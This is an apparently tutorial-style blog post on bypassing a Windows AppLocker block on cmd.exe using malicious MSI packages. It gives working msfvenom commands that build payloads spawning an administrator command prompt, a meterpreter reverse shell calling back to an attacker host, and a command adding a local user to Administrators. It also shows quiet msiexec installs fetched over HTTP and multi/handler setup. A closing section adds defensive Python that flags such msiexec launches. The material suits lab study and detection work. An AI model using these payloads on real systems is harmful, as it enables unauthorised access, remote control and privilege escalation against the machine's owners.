In our previous article, “Windows AppLocker Policy – A Beginner’s Guide”, we discussed how AppLocker rules define your application control policies and how to work with them. Today you will learn how AppLocker policies can be bypassed. In this post, we have blocked the cmd.exe file using a Windows AppLocker policy and will try to bypass this restriction to get a command prompt as administrator.
Table of Contents
Associated file formats where AppLocker is applicable
Challenge 1: Bypass AppLocker with .msi file to get CMD as Administrator
A little bit more about MSI files
Multiple Methods to get CMD as Administrator
· Generate Malicious .msi file with Msfvenom - 1st Method
· Generate Malicious .msi file with Msfvenom - 2nd Method
· Generate Malicious .msi file with Msfvenom - 3rd Method
Challenge 2: Make a local user member of Administrators Group
· Generate Malicious .msi file with Msfvenom - 4th Method
Associated file formats where AppLocker is applicable
Windows AppLocker is a feature that was introduced in Windows 7 and Windows Server 2008 R2 as a method to restrict the use of unwanted programs. With it, an administrator can restrict the execution of the following programs:
It depends entirely on the system administrator which programs or scripts he wants to cover with an AppLocker policy in order to restrict their execution. There could be a situation where Command Prompt (cmd.exe), PowerShell, DLL files, batch files, rundll32.exe, regsvr32, regasm and many more are blocked.
Challenge 1: Bypass AppLocker with .msi file to get CMD as Administrator
Let’s suppose you are in a situation where all the above-mentioned applications are blocked and only Windows Installer files, i.e. the .msi extension, are allowed to run without any restriction. How, then, can you use an .msi file to bypass these restrictions and get a full-privilege shell?
A little bit more about MSI files
The MSI name comes from the program’s original title, Microsoft Installer. Since then the name has changed to Windows Installer.
A file with the .msi extension is a Windows Installer package. An installation package contains all the information Windows Installer needs to install or uninstall an application. Each installation package contains a .msi file, which holds an installation database, a summary information stream and data streams for the different parts of the installation.
The Windows Installer technology is divided into two parts that work in combination: a client-side installer service (Msiexec.exe) and a Microsoft Software Installation (MSI) package file. Windows Installer uses the information contained in a package file to install the program.
The Msiexec.exe program is a component of Windows Installer. When it is called by Setup, Msiexec.exe uses Msi.dll to read the package (.msi) files, apply any transform (.mst) files, and incorporate command-line options supplied by Setup. The installer performs all installation-related tasks, including copying files to the hard disk, making registry modifications, creating shortcuts on the desktop, and displaying dialog boxes to prompt for user installation preferences when necessary.
When Windows Installer is installed on a computer, it changes the registered file type of .msi files so that if you double-click an .msi file, Msiexec.exe runs with that file.
Each MSI package file contains a relational-type database that stores instructions and data required to install (and remove) the program across many installation scenarios.
Multiple Methods to get CMD as Administrator
Generate Malicious .msi file with Msfvenom - 1st Method
Now let’s open a new terminal on the Kali machine and generate a malicious MSI package file named cmd.msi, which will give us a command prompt by using the windows/exec payload:
msfvenom -p windows/exec CMD=cmd.exe -f msi > cmd.msi
python -m SimpleHTTPServer 80
Now transfer the cmd.msi file to your Windows machine to obtain a command prompt shell as administrator. Here we have used Python’s HTTP server to share the file over the network.
Once you have downloaded the .msi file on your local machine (the Windows OS where cmd.exe is blocked by the admin), you can use the following syntax to run the .msi file with msiexec.exe from the Run prompt.
Syntax:
msiexec /quiet /i <path to the .msi file>
msiexec /quiet /i C:\Users\raj\Desktop\cmd.msi
As soon as you hit the above command in the Run prompt, you will get the Command Prompt as administrator.
Generate Malicious .msi file with Msfvenom - 2nd Method
Note: Even if you rename the cmd.msi file to another extension, it will still bypass the rule and start a command prompt as administrator.
Repeat the above to generate an msi file with the same payload as msfvenom and name it cmd.png. Since I already have a cmd.msi file on my Kali, I rename it to cmd.png and use a Python server to transfer it.
Once you have downloaded the cmd.png file (which is actually an .msi file) on your local machine (the Windows OS where cmd.exe is blocked by the admin), you can use the following syntax to run the .msi file with msiexec.exe from the Run prompt.
Syntax:
msiexec /q /i <URL or path of the .msi file>
msiexec /q /i http://192.168.1.107/cmd.png
As soon as you hit the above command in the Run prompt, you will get the Command Prompt as administrator.
Generate Malicious .msi file with Msfvenom - 3rd Method
In the above methods we obtained a command prompt by using the windows/exec payload; now we will use the windows/meterpreter/reverse_tcp payload to get a full-privilege command shell through a meterpreter session.
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.107 lport=1234 -f msi > shell.msi
Now again transfer the shell.msi file to your Windows machine to obtain a command prompt shell as administrator, and start multi/handler. Here we have used Python’s HTTP server to share the file over the network.
Once you have downloaded the shell.msi file on your local machine (the Windows OS where cmd.exe is blocked by the admin), you can use the following syntax to run the .msi file with msiexec.exe from the Run prompt.
Syntax:
msiexec /q /i <URL or path of the .msi file>
msiexec /q /i http://192.168.1.107/shell.msi
As soon as you hit the above command in the Run prompt, you will get the Command Prompt as administrator through the meterpreter session opened by the handler below.
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.107
msf exploit(handler) > set lport 1234
msf exploit(handler) > exploit
meterpreter > shell
Challenge 2: Make a local user member of Administrators Group
Let’s suppose you are in a similar situation where all the above-mentioned applications are blocked and only Windows Installer files, i.e. the .msi extension, are allowed to run without any restriction. How, then, can you use an .msi file to bypass these restrictions and make a local user a member of the Administrators group when cmd.exe is blocked?
Note: Here aaru is a local, non-administrative user account, as shown below:
As we know, due to the AppLocker execution rule policy, cmd.exe is blocked on the local machine, therefore we cannot use the command prompt to add aaru to the Administrators group.
Generate Malicious .msi file with Msfvenom - 4th Method
Generate an MSI package named admin.msi with the windows/exec payload, carrying a command that adds the user “aaru” to the local Administrators group on the target machine.
msfvenom -p windows/exec CMD='net localgroup administrators aaru /add' -f msi > admin.msi
Now transfer the admin.msi file to your Windows machine to add aaru to the Administrators group. Here we have used Python’s HTTP server to share the file over the network.
Once you have downloaded the admin.msi file on your local machine (the Windows OS where cmd.exe is blocked by the admin), you can use the following syntax to run the .msi file with msiexec.exe from the Run prompt.
Syntax:
msiexec /q /i <URL or path of the .msi file>
msiexec /q /i http://192.168.1.107/admin.msi
As soon as you hit the above command in the Run prompt, you can confirm that the aaru user has become a member of the Administrators group.
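All four msiexec invocations above share one shape that a defender can alert on from process-creation telemetry (Security event 4688 or Sysmon event 1): msiexec quietly installing a package from a URL, from a user-writable path, or from a file whose extension is not .msi, as in the renamed cmd.png. The following Python triage over constructed sample events is an added example, not code from the original post; the event tuples, the user-writable path heuristic and the reason strings are my assumptions.

```python
import re
from urllib.parse import urlparse

# Constructed sample process-creation records (image, command line), in the shape a
# Security 4688 / Sysmon event 1 feed carries them. Not data taken from the post.
SAMPLE_EVENTS = [
    (r"C:\Windows\System32\msiexec.exe", r"msiexec /quiet /i C:\Users\raj\Desktop\cmd.msi"),
    (r"C:\Windows\System32\msiexec.exe", "msiexec /q /i http://192.168.1.107/cmd.png"),
    (r"C:\Windows\System32\msiexec.exe", "msiexec /q /i http://192.168.1.107/shell.msi"),
    (r"C:\Windows\System32\msiexec.exe", r'msiexec /i "C:\Program Files\Vendor\setup.msi"'),
    (r"C:\Windows\System32\notepad.exe", "notepad.exe readme.txt"),
]

# /i (or /package) names the package to install; the argument may be quoted.
INSTALL_ARG = re.compile(r'(?:^|\s)[/-](?:i|package)\s+(?:"([^"]+)"|(\S+))', re.I)
# msiexec's unattended UI switches (/q, /qn, /qb, /quiet ...).
QUIET_FLAG = re.compile(r'(?:^|\s)[/-](?:q[nbrf]?|quiet)(?=\s|$)', re.I)
# Heuristic (assumption): user-writable locations an admin-deployed installer rarely lives in.
USER_WRITABLE = re.compile(r'\\(?:Users|Temp|ProgramData)\\', re.I)

def install_target(cmdline):
    """Return the package argument of an msiexec install command, or None."""
    m = INSTALL_ARG.search(cmdline)
    return (m.group(1) or m.group(2)) if m else None

def suspicious_reasons(image, cmdline):
    """Explain why an msiexec launch matches the bypass pattern; [] means benign."""
    if not image.lower().endswith("\\msiexec.exe"):
        return []
    target = install_target(cmdline)
    if target is None:
        return []
    reasons = []
    if urlparse(target).scheme.lower() in ("http", "https") or target.startswith("\\\\"):
        reasons.append("remote source")        # package pulled over HTTP or UNC
    if not target.lower().endswith(".msi"):
        reasons.append("non-.msi extension")   # renamed package, e.g. cmd.png
    if USER_WRITABLE.search(target):
        reasons.append("user-writable path")
    if reasons and QUIET_FLAG.search(cmdline):
        reasons.append("quiet install")        # no UI the user would notice
    return reasons

def triage(events):
    """Return [(cmdline, reasons)] for every event that looks like the bypass."""
    scored = ((cmd, suspicious_reasons(img, cmd)) for img, cmd in events)
    return [(cmd, reasons) for cmd, reasons in scored if reasons]
```

The vendor install from Program Files with a full UI produces no finding, while the three invocations from this post are flagged with the reasons a SOC analyst would want in the alert.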
Hopefully it is now clear how an .msi file can be used to compromise an operating system where cmd.exe and other applications are blocked by the administrator.